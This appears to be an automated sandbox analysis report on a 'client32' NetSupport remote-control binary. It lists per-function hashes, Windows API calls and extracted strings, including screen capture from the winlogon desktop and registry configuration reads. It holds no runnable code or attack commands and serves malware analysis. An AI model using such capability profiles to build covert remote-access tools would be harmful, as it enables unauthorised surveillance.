Opcode ID: bce5d3ccbce10ed5eefc93319fcdcff04fec20c36a24ddf07fe8ce088f884d40
Instruction ID: e17b5be7c9f279923d338761c599270f53c35d08167a1dd70bb196578b399fb7
Opcode Fuzzy Hash: bce5d3ccbce10ed5eefc93319fcdcff04fec20c36a24ddf07fe8ce088f884d40
Instruction Fuzzy Hash: 3471B2B2E41228AFDB04CFE5CC88BEEB7B9FF48705F044129F515E7244D674A9408BA1

Function 1105D240 Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 124filewindowCOMMON

Download Yara Rule

APIs

OpenFileMappingA.KERNEL32 ref: 1105D277
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 1105D294
GetDC.USER32(00000000), ref: 1105D2BB
CreateCompatibleDC.GDI32(00000000), ref: 1105D2CF
CreateDIBSection.GDI32(00000000,00000004,00000000,?,?,?), ref: 1105D2F2
SelectObject.GDI32(00000000,00000000), ref: 1105D300
GetTickCount.KERNEL32 ref: 1105D30F
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 1105D333
GetTickCount.KERNEL32 ref: 1105D33C
GetLastError.KERNEL32(?), ref: 1105D348
GdiFlush.GDI32 ref: 1105D35C
SelectObject.GDI32(00000000,?), ref: 1105D367
DeleteObject.GDI32(00000000), ref: 1105D36E
DeleteDC.GDI32(00000000), ref: 1105D378
ReleaseDC.USER32(00000000,00000000), ref: 1105D384
UnmapViewOfFile.KERNEL32(00000000), ref: 1105D38E
CloseHandle.KERNEL32(00000000), ref: 1105D396

Strings

/thumb:, xrefs: 1105D255
ThumbWL, xrefs: 1105D246
Error %d blitting from winlogon, took %d ms, xrefs: 1105D34F

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FileObject$CountCreateDeleteSelectTickView$CloseCompatibleErrorFlushHandleLastMappingOpenReleaseSectionUnmap
String ID: /thumb:$Error %d blitting from winlogon, took %d ms$ThumbWL
API String ID: 652520247-4094952007
Opcode ID: 8f5b295e94eaa7f285b731955c0fd9ff915ca6e09ee39c0381679d34cd356cea
Instruction ID: 78b6d8997dae8530c3cf648a665dcf4201cc58d59c57f0d4bee68b800920de56
Opcode Fuzzy Hash: 8f5b295e94eaa7f285b731955c0fd9ff915ca6e09ee39c0381679d34cd356cea
Instruction Fuzzy Hash: 924190B9E41229AFD704CFA4DD89FAEBBB8FB48704F104165F920A7644D730A901CBA1

Function 1102B4C0 Relevance: 33.5, APIs: 4, Strings: 15, Instructions: 291timeCOMMON

Download Yara Rule

APIs

Part of subcall function 110ED520: RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?), ref: 110ED53C

Part of subcall function 110CFE80: _malloc.LIBCMT ref: 110CFE9A

Part of subcall function 110ED180: RegEnumKeyExA.ADVAPI32 ref: 110ED1CB

wsprintfA.USER32 ref: 1102B84D

Part of subcall function 110ED8F0: RegQueryInfoKeyA.ADVAPI32 ref: 110ED926

FileTimeToSystemTime.KERNEL32(0002001F,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 1102B65A
wsprintfA.USER32 ref: 1102B69E
wsprintfA.USER32 ref: 1102B705

Part of subcall function 110EDF70: wsprintfA.USER32 ref: 110EDFD4
Part of subcall function 110EDF70: _malloc.LIBCMT ref: 110EE053

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1102B8AC, 1102B8C0
WDM, xrefs: 1102B6D7
DirectSound\Device Presence, xrefs: 1102B5E4
IsA(), xrefs: 1102B8B1, 1102B8C5
Warning. DSReg e=%d, e2=%d, xrefs: 1102B7EE
DirectSound, xrefs: 1102B58B
accel=%d, wdm=%d, key=%s, mix=%s, dev=%s, xrefs: 1102B72B
set %s=15, e=%d, xrefs: 1102B796
Software\NSL\Saved\DS, xrefs: 1102B75E, 1102B7BB
Acceleration, xrefs: 1102B6BA, 1102B763, 1102B77E, 1102B791, 1102B7C0
%s\%s, xrefs: 1102B6FF, 1102B847
Error. Can't open %s, xrefs: 1102B8D0
Accel=restored, xrefs: 1102B7DD
DirectSound\Mixer Defaults, xrefs: 1102B5B7, 1102B6F3
%02d/%02d/%02d %02d:%02d:%02d.%03d, xrefs: 1102B698

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$Time_malloc$EnumFileInfoOpenQuerySystem
String ID: %02d/%02d/%02d %02d:%02d:%02d.%03d$%s\%s$Accel=restored$Acceleration$DirectSound$DirectSound\Device Presence$DirectSound\Mixer Defaults$Error. Can't open %s$IsA()$Software\NSL\Saved\DS$WDM$Warning. DSReg e=%d, e2=%d$accel=%d, wdm=%d, key=%s, mix=%s, dev=%s$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$set %s=15, e=%d
API String ID: 2153351953-120756110
Opcode ID: 16ea69e6aed828567fb58803387b960e2f84e8ff47cc7e9f30f766e1ef55425b
Instruction ID: 3d8c04e41a601bc5ed25e478ecb801087f545ab88011abf8f54d42b1378c6c4c
Opcode Fuzzy Hash: 16ea69e6aed828567fb58803387b960e2f84e8ff47cc7e9f30f766e1ef55425b
Instruction Fuzzy Hash: CEB17075D0122AAFDB24DB55CD98FEDB7B8EF05308F4041D9E91962280EB346E88CF61

Function 1105F830 Relevance: 30.1, APIs: 4, Strings: 13, Instructions: 340COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1105F890
wsprintfA.USER32 ref: 1105F8A4
wsprintfA.USER32 ref: 1105F8FF
ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,?,00000000,?,80000002,?,00020019), ref: 1105F97F

Strings

Software\Productive Computer Insight, xrefs: 1105F86D
\, xrefs: 1105FA5A
NetSupport School Pro, xrefs: 1105FCE1
HKLM, xrefs: 1105FA01
NSM, xrefs: 1105F8ED, 1105F8F2
ConfigList, xrefs: 1105FADA
Software\NetSupport Ltd, xrefs: 1105F893
HKCU, xrefs: 1105FA48
NSS, xrefs: 1105F8E6
%sUseHKLM, xrefs: 1105F8F9
General\ProductId, xrefs: 1105FB8D
%s\%s, xrefs: 1105F878, 1105F89E, 1105FAE6
NetSupport School, xrefs: 1105FCFD

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$EnvironmentExpandStrings
String ID: %sUseHKLM$%s\%s$ConfigList$General\ProductId$HKCU$HKLM$NSM$NSS$NetSupport School$NetSupport School Pro$Software\NetSupport Ltd$Software\Productive Computer Insight$\
API String ID: 2608976442-3241390832
Opcode ID: ecdd20f2323e681a36014c6c58700e4024b6c0ee02548503430c58d0ba2d7c2c
Instruction ID: e96a2cbbb3b754be6409a963181338f47424fc131a1cec65b85ff3420bffa3c7
Opcode Fuzzy Hash: ecdd20f2323e681a36014c6c58700e4024b6c0ee02548503430c58d0ba2d7c2c
Instruction Fuzzy Hash: 89D1C375D0126EAEDB61DB64DD54BDEB7B8AF19309F0000D8D909A3181FB746B84CFA2

Function 1113B660 Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 308COMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000010,00000000,111F1A18,00000000), ref: 1113B6F2
SystemParametersInfoA.USER32(00000011,00000000,00000000,00000000), ref: 1113B705
SHGetFolderPathA.SHFOLDER(00000000,00000010,00000000,00000000,00000000), ref: 1113B89D
GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 1113B8B3
CloseHandle.KERNEL32(00000000), ref: 1113B8FB

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

SystemParametersInfoA.USER32(00000011,00000001,00000000,00000000), ref: 1113BA43

Strings

PrefixName, xrefs: 1113B824
UI: End Show, xrefs: 1113B9D9
ShowRecord, xrefs: 1113B7F9, 1113B811, 1113B829, 1113B90F, 1113B943
Client, xrefs: 1113B764, 1113B78E, 1113B7BF, 1113B7DA, 1113BA20
ShowToWindow, xrefs: 1113B75F, 1113B789, 1113B7BA, 1113B7D5, 1113BA1B
Show, xrefs: 1113B856
RecordAudio, xrefs: 1113B80C
\Desktop, xrefs: 1113B8C8
ReplayFiles, xrefs: 1113B7F4
UI: Start Show, xrefs: 1113B6C5
ReplayPath, xrefs: 1113B851, 1113B90A

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InfoParametersSystem$CloseDirectoryFolderHandlePathWindows__wcstoi64
String ID: Client$PrefixName$RecordAudio$ReplayFiles$ReplayPath$Show$ShowRecord$ShowToWindow$UI: End Show$UI: Start Show$\Desktop
API String ID: 3054845645-718119679
Opcode ID: cad26973e156c2776a079135ce5d729a52d5268c4a26378e177e48f36ebaf952
Instruction ID: 97c658d0ff47ffb6e0b086364488060456d2f78afd94873c83fd0d8ea8d00dc5
Opcode Fuzzy Hash: cad26973e156c2776a079135ce5d729a52d5268c4a26378e177e48f36ebaf952
Instruction Fuzzy Hash: 9DB15A74B41625AFE316DBA0CD91FE9FB61FB84B19F004129FA15AB2C8E770B840C795

Function 110EB540 Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 141windowtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

wsprintfA.USER32 ref: 110EB5D8
GetTickCount.KERNEL32(_debug,TracePlugins,00000000,00000000,?,?,00000000), ref: 110EB632
SendMessageA.USER32(?,0000004A,?,?,?,00000000), ref: 110EB646
GetTickCount.KERNEL32(?,0000004A,?,?,?,00000000), ref: 110EB64E
SendMessageTimeoutA.USER32(?,0000004A,?,?,00000000,?,?), ref: 110EB696
OpenEventA.KERNEL32(00000002,00000000,runplugin.dmp.1,?,00000000), ref: 110EB6C8
SetEvent.KERNEL32(00000000,?,00000000), ref: 110EB6D5
CloseHandle.KERNEL32(00000000), ref: 110EB6DC

Strings

Error. Runplugin is unresponsive, xrefs: 110EB6E2
%s, xrefs: 110EB603
_debug, xrefs: 110EB56D
runplugin.dmp.1, xrefs: 110EB6BF
runplugin %s (hWnd=%x,u=%d,64=%d) , xrefs: 110EB5D2
DATA, xrefs: 110EB586
TracePlugins, xrefs: 110EB560
Warning: SendMessage to Runplugin took %d ms (possibly unresponsive), xrefs: 110EB65A
INIT, xrefs: 110EB57C

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountEventMessageSendTick$CloseHandleOpenTimeout__wcstoi64wsprintf
String ID: %s$DATA$Error. Runplugin is unresponsive$INIT$TracePlugins$Warning: SendMessage to Runplugin took %d ms (possibly unresponsive)$_debug$runplugin %s (hWnd=%x,u=%d,64=%d) $runplugin.dmp.1
API String ID: 3451743168-2289091950
Opcode ID: c1241e5542d040f8c34fd841d2e563697d9392d2fed16766f0bb09ef5b5a5159
Instruction ID: 06eeb675c9fb82aaee3c5e1b90d71b9ae50c85907530b7dc4e87486fa2a47647
Opcode Fuzzy Hash: c1241e5542d040f8c34fd841d2e563697d9392d2fed16766f0bb09ef5b5a5159
Instruction Fuzzy Hash: A141E775A012199FD724CFA5DC84FAEF7B8EF48304F1085AAE91AA7640D631AD40CFB1

Function 110CB450 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 117registryclipboardCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(HJN,?,00000000,00000000,?,110CB60A,1105E75F,?,00000000,?,110BE929,00000000,00000000,?,1105E75F,?), ref: 110CB45E
RegisterClipboardFormatA.USER32(WM_ATLGETHOST), ref: 110CB46F
RegisterClipboardFormatA.USER32(WM_ATLGETCONTROL), ref: 110CB47B
GetClassInfoExA.USER32(11000000,AtlAxWin100,?), ref: 110CB4A0
LoadCursorA.USER32(00000000,00007F00), ref: 110CB4D1
RegisterClassExA.USER32 ref: 110CB4F2
_memset.LIBCMT ref: 110CB51B
GetClassInfoExA.USER32(11000000,AtlAxWinLic100,?), ref: 110CB536
LoadCursorA.USER32(00000000,00007F00), ref: 110CB56B
RegisterClassExA.USER32 ref: 110CB58C
LeaveCriticalSection.KERNEL32(HJN,0000000E), ref: 110CB5B5
LeaveCriticalSection.KERNEL32(HJN,?,?,?,?,110CB60A,1105E75F,?,00000000,?,110BE929,00000000,00000000,?,1105E75F,?), ref: 110CB5CB

Part of subcall function 110C2C00: __recalloc.LIBCMT ref: 110C2C48

Strings

HJN, xrefs: 110CB459, 110CB5AB, 110CB5C6
WM_ATLGETHOST, xrefs: 110CB46A
AtlAxWin100, xrefs: 110CB492, 110CB4E8
WM_ATLGETCONTROL, xrefs: 110CB471
AtlAxWinLic100, xrefs: 110CB52D, 110CB582

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ClassRegister$CriticalSection$ClipboardCursorFormatInfoLeaveLoad$Enter__recalloc_memset
String ID: AtlAxWin100$AtlAxWinLic100$HJN$WM_ATLGETCONTROL$WM_ATLGETHOST
API String ID: 2220097787-3027925682
Opcode ID: 8be8c82d578b7ce9cf9cc495cb365543be575607f387d856cefed87b35aa24b4
Instruction ID: 380367346e18165f725bae6bc82d4f79de56b371e9301c8febdab5dbf058e0d0
Opcode Fuzzy Hash: 8be8c82d578b7ce9cf9cc495cb365543be575607f387d856cefed87b35aa24b4
Instruction Fuzzy Hash: 854179B5D02229ABCB01DFD9E984AEEFFB9FB48714F50406AE415B3200DB351A44CFA4

Function 11071B60 Relevance: 28.3, APIs: 14, Strings: 2, Instructions: 322sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 11088C40: IsWindow.USER32(?), ref: 11088C5F
Part of subcall function 11088C40: IsWindow.USER32(?), ref: 11088C6D

EnableWindow.USER32(00000000,00000000), ref: 11071BAB

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

CloseHandle.KERNEL32(00000000), ref: 11071C1A
_memset.LIBCMT ref: 11071C62
GetTickCount.KERNEL32(?,?,00000002), ref: 11071C73
GetTickCount.KERNEL32(?,?,00000002), ref: 11071C7C
GetTickCount.KERNEL32(?,?,00000002), ref: 11071C95
Sleep.KERNEL32(?,?,?,00000002), ref: 11071CD8
Sleep.KERNEL32(0000000A,?,?,00000002), ref: 11071D2D
GetTickCount.KERNEL32(?,?,?,?,?,00000002), ref: 11071E78

Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,774E42C0,?,11110F3D,00000000,00000001,?,?,?,?,?,11031700), ref: 1111029E

Strings

gfff, xrefs: 11071CB6
, xrefs: 11071E3E

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$Window$Sleep_memset$CloseCreateEnableEventHandle_mallocwsprintf
String ID: $gfff
API String ID: 891474222-257315895
Opcode ID: 44063090aa28f62224d78ecb02e939bf8d8117b27dce2b65f00e15d810b8b071
Instruction ID: 513feb5f7381e08072cb6c26fa2f18ad4f0fb6e6a3d9412ac9f35556057935f0
Opcode Fuzzy Hash: 44063090aa28f62224d78ecb02e939bf8d8117b27dce2b65f00e15d810b8b071
Instruction Fuzzy Hash: 11C1BD74B003159FEB24DF64CD81BAAB7B6FF88704F1085A8E556AB3C0DB74A941CB45

Function 110398B0 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,0000044D), ref: 110398CC
IsWindowVisible.USER32(00000000), ref: 110398CF
GetDlgItem.USER32(?,0000044F), ref: 110398F8
IsWindowVisible.USER32(00000000), ref: 110398FB
GetDlgItem.USER32(?,000004BE), ref: 11039928
IsWindowVisible.USER32(00000000), ref: 1103992B
GetDlgItem.USER32(?,000017EC), ref: 11039958
IsWindowVisible.USER32(00000000), ref: 1103995B
GetDlgItem.USER32(?,0000048D), ref: 11039988
IsWindowVisible.USER32(00000000), ref: 1103998B
GetDlgItem.USER32(?,0000048E), ref: 110399B8
IsWindowVisible.USER32(00000000), ref: 110399BB

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

GetDlgItem.USER32(00000000,00000001), ref: 11039A02
EnableWindow.USER32(00000000,00000001), ref: 11039A06

Strings

m_hWnd, xrefs: 110399EF
e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h, xrefs: 110399EA

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ItemWindow$Visible$EnableErrorExitLastMessageProcesswsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
API String ID: 2531669725-1986719024
Opcode ID: d168139fabaf00070f6a95217ffc7b6ddd9d783989ebd31efb4cdcea38c75ad5
Instruction ID: c605c523e88007737b9d27236d90d9a53477605ae0cc304b47ea9e042cf8b0eb
Opcode Fuzzy Hash: d168139fabaf00070f6a95217ffc7b6ddd9d783989ebd31efb4cdcea38c75ad5
Instruction Fuzzy Hash: EA4195757407056FF624DAA9CD81F1AB7DAABC8B40F208518F769DB3C0EEB0E8408758

Function 11039410 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 126windowCOMMON

Download Yara Rule

APIs

Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276

GetDlgItem.USER32(00000000,00000001), ref: 1103944A
EnableWindow.USER32(00000000,00000000), ref: 1103944F
_calloc.LIBCMT ref: 1103945C
GetSystemMenu.USER32 ref: 11039490
EnableMenuItem.USER32 ref: 1103949E
GetDlgItem.USER32(00000000,0000044E), ref: 110394BC
SetWindowPos.USER32(00000000,00000001,00000000,00000000,00000000,00000000,00000043), ref: 11039509
SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043), ref: 11039538
UpdateWindow.USER32 ref: 11039567
BringWindowToTop.USER32(?), ref: 1103956E

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Part of subcall function 1115FFC0: SetForegroundWindow.USER32(?), ref: 1115FFEE

MessageBeep.USER32(000000FF,00000001), ref: 1103957F

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110394E1, 11039516, 11039551
